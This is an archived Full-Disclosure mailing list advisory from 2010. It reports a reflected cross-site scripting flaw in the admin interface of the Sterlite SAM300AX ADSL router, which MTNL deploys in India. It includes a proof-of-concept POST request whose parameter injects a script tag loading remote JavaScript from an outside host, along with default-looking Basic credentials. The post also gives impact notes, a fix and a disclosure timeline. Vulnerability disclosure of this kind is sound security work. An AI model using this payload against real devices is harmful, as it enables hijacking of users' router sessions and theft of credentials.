[prev in list] [next in list] [prev in thread] [next in thread] 

List:       full-disclosure
Subject:    [Full-disclosure] Sterlite SAM300AX ADSL router - Cross Site
From:       Karn Ganeshen <karnganeshen () gmail ! com>
Date:       2010-02-04 19:51:58
Message-ID: a4dcca121002041139x2c1fd329o39fa2de5f03a24ed () mail ! gmail ! com
[Download RAW message or body]

[Attachment #2 (multipart/alternative)]


*Sterlite SAM300AX ADSL router* is provided through MTNL, New Delhi, India,
amongst other national / international locations
(www.sterlitetechnologies.com /
http://sterlitetechnologies.com/sterlite.aspx).

##########

*+About MTNL+*

http://mtnldelhi.in/glance/index.htm

MTNL was set up on 1st April, 1986 by the Government of India to upgrade the
quality of telecom services, expand the telecom network, introduce new
services and to raise revenue for telecom development needs of India’s key
metros – Delhi, the political capital and Mumbai, the business capital of
India.

Govt. of India currently holds 56.25% stake in the company.

*+Broadband device used+*

http://delhi.mtnl.net.in/services/broadband.htm

Sterlite SAM300AX ADSL router is deployed by MTNL at user's end (usually
home / small office) for internet broadband services.

*+Vulnerability+*

A. Reflective Cross Site Scripting ( May also result in remote code
execution )

*+Details of Vulnerability+*

The management interface of the router is accessible through HTTP. After
logging in, we are presented with various administrative screens.

It has been found that the user input is not properly filtered and / or
encoded by the application. Hence, allowing an attacker to execute scripts
on the user's browser.

*+Pre-Requisites+*
*User logged on to the Router.*
*
+PoC+*

One of the vulnerable HTTP requests & parameters is provided below for
reference.
Go to Menu -> Statistics

*+POST Request+*

POST http://192.168.1.1/Forms/status_statistics_1 HTTP/1.1
Host: 192.168.1.1
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.1.7)
Gecko/20091221 Firefox/3.5.7 Paros/3.2.13
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-us,en;q=0.5
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 300
Proxy-Connection: keep-alive
Referer: http://192.168.1.1/status/status_statistics.htm
Authorization: Basic YWRtaW46YWRtaW4=
Content-Type: application/x-www-form-urlencoded
Content-length: 101

*+POST Parameters+*

Stat_Radio=%3CSCRIPT%20SRC%3Dhttp%3A%2F%2Fha.ckers.org
%2Fxss.js%3E%3C%2FSCRIPT%3E&StatRefresh=REFRESH

*+Impact+*

High Impact. This device is supplied in Delhi, and Mumbai through MTNL, a
Govt. of India controlled organization. As there is no filtering / encoding
in place, an attacker has the opportunity to get the scripts executed by the
user (logged on to the router http://192.168.1.1). XSS can be used to obtain
login credentials, download malware, execute scripts from external sources,
gain access to the system and subsequently perform further serious attacks
like DoS/DDoS.

*+Solution+*

A. Sanitize / filter all input.
B. Ensure ALL Input and Output is encoded properly.

*+References+*
-> OWASP (www.owasp.org)

##########

*Vulnerability Found:* January 19, 2010

*Vendor First Notified: January 20, 2010 *
*Vendor Response:* None

*Follow Up Notification: *January 27, 2010
*Vendor Response:* None

*Public Disclosure:* February 05, 2010

##########

Best Regards,
Karn Ganeshen

[Attachment #5 (text/html)]

<font face="tahoma, sans-serif"><b>Sterlite SAM300AX ADSL router</b> is provided \
through MTNL, New Delhi, India, amongst other national / international \
locations<br>(<a href="http://www.sterlitetechnologies.com" \
target="_blank">www.sterlitetechnologies.com</a> / <a \
href="http://sterlitetechnologies.com/sterlite.aspx">http://sterlitetechnologies.com/sterlite.aspx</a>).</font><div>





<font face="tahoma, sans-serif"><br>##########<br><br><b>+About MTNL+</b><br><br><a \
href="http://mtnldelhi.in/glance/index.htm" \
target="_blank">http://mtnldelhi.in/glance/index.htm</a><br><br>MTNL was set up on \
1st April, 1986 by the Government of India to upgrade the quality of telecom \
services, expand the telecom network, introduce new services and to raise revenue for \
telecom development needs of India’s key metros – Delhi, the political capital and \
Mumbai, the business capital of India.<br>




<br>Govt. of India currently holds 56.25% stake in the company.<br><br><b>+Broadband \
device used+</b><br><br><a href="http://delhi.mtnl.net.in/services/broadband.htm" \
target="_blank">http://delhi.mtnl.net.in/services/broadband.htm</a><br>




<br>Sterlite SAM300AX ADSL router is deployed by MTNL at user&#39;s end (usually home \
/ small office) for internet broadband \
services.<br><br><b>+Vulnerability+</b><br><br></font><div><font face="tahoma, \
sans-serif">A. Reflective Cross Site Scripting ( May also result in remote code \
execution )<br>




<br><b>+Details of Vulnerability+</b><br><br>The management interface of the router \
is accessible through HTTP. After logging in, we are presented with various \
administrative screens.</font></div><div><font face="tahoma, sans-serif"><br>



It has been found that the user input is not properly filtered and / or encoded by \
the application. Hence, allowing an attacker to execute scripts on the user&#39;s \
browser.<br> <br></font></div><div><font face="tahoma, \
sans-serif"><b>+Pre-Requisites+</b></font></div><div><font face="tahoma, \
sans-serif"><b><span style="font-weight:normal">User logged on to the \
Router.</span></b></font></div> <div><font face="tahoma, sans-serif"><b><span \
style="font-weight:normal"><br></span>+PoC+</b><br><br>One of the vulnerable HTTP \
requests &amp; parameters is provided below for reference.<br> Go to Menu -&gt; \
Statistics<br><br><b>+POST Request+</b><br><br>POST <a \
href="http://192.168.1.1/Forms/status_statistics_1" \
target="_blank">http://192.168.1.1/Forms/status_statistics_1</a> HTTP/1.1<br>Host: \
192.168.1.1<br>



User-Agent: Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.1.7) \
                Gecko/20091221 Firefox/3.5.7 Paros/3.2.13<br>
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8<br>Accept-Language: \
en-us,en;q=0.5<br>Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7<br>Keep-Alive: \
300<br>Proxy-Connection: keep-alive<br>Referer: <a \
href="http://192.168.1.1/status/status_statistics.htm" \
target="_blank">http://192.168.1.1/status/status_statistics.htm</a><br>




Authorization: Basic YWRtaW46YWRtaW4=<br>Content-Type: \
application/x-www-form-urlencoded<br>Content-length: 101<br><br><b>+POST \
Parameters+</b><br><br>Stat_Radio=%3CSCRIPT%20SRC%3Dhttp%3A%2F%<a \
href="http://2Fha.ckers.org" \
target="_blank">2Fha.ckers.org</a>%2Fxss.js%3E%3C%2FSCRIPT%3E&amp;StatRefresh=REFRESH<br>





<br><b>+Impact+</b><br><br>High Impact. This device is supplied in Delhi, and Mumbai \
through MTNL, a Govt. of India controlled organization. As there is no filtering / \
encoding in place, an attacker has the opportunity to get the scripts executed by the \
user (logged on to the router <a href="http://192.168.1.1" \
target="_blank">http://192.168.1.1</a>). XSS can be used to obtain login credentials, \
download malware, execute scripts from external sources, gain access to the system \
and subsequently perform further serious attacks like DoS/DDoS.<br>




<br><b>+Solution+</b><br><br>A. Sanitize / filter all input.<br>B. Ensure ALL Input \
and Output is encoded properly.<br><br><b>+References+</b><br>-&gt; OWASP (<a \
href="http://www.owasp.org" target="_blank">www.owasp.org</a>)<br>



<br>##########<br>
<br></font></div><div><font face="tahoma, sans-serif"><b>Vulnerability Found:</b> \
January 19, 2010</font></div><div><font face="tahoma, \
sans-serif"><br></font></div><div><font face="tahoma, sans-serif"><b>Vendor<span \
style="font-weight:normal"><b> First<span style="font-weight:normal"><b> \
Notified:</b> January 20, 2010 </span></b></span></b></font></div>




<div><font face="tahoma, sans-serif"><b>Vendor Response:</b> \
None</font></div><div><font face="tahoma, sans-serif"><br><b>Follow Up Notification: \
</b>January 27, 2010</font></div> <div><font face="tahoma, sans-serif"><b>Vendor \
Response:</b> None</font></div><div><font face="tahoma, \
sans-serif"><br></font></div><div><font face="tahoma, sans-serif"><b>Public \
Disclosure:</b> February 05, 2010</font></div>




<div><font face="tahoma, sans-serif"><br></font></div><div><font face="tahoma, \
sans-serif">##########</font></div><div><font face="tahoma, sans-serif"><br> Best \
Regards,<br>Karn Ganeshen</font></div></div>



_______________________________________________
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/

[prev in list] [next in list] [prev in thread] [next in thread] 

Configure | About | News | Add a list | Sponsored by KoreLogic